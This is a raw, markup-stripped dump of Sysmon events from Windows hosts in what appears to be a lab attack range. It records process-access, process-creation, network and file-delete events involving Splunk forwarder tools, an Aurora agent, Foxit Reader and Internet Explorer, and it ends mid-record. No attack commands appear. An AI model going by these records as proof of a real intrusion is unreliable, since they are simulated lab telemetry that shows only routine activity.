12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018321Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018320Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E5F1-63C7-3302-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018319Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018318Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.032{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018317Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.031{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5F1-63C7-3302-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018316Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:33.031{E5A8D418-E5F1-63C7-3302-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000045988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.696{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56449-false10.0.1.12-8000- 10341000x800000000000000045987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.194{FE4C2B44-E5F1-63C7-7D06-00000000AF02}61606940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.045{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5F1-63C7-7D06-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.044{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.043{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.043{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E5F1-63C7-7D06-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.043{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5F1-63C7-7D06-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:33.043{FE4C2B44-E5F1-63C7-7D06-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018345Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.752{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963B9B496FEC99DC7E4661D17ADD2AB5,SHA256=1DF1E9E30D01D06BA7DD91FFBF4740EF01C10E6162067E43BAE3B0FBF155958F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.939{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=8CCBFEE1E8C1ED6B94B86ADD68BA36AB,SHA256=0714843D912641772DB9CA65935BBEA3E560ED3A7C9BA4658D3532DA2283A14B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=E373E7E73E5A1DD7FE803625260A851A,SHA256=97AE7D6B26065CEFAE2E5AA8D779BF1DBF78887CF0E2109CAF1A5D3B89151AE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 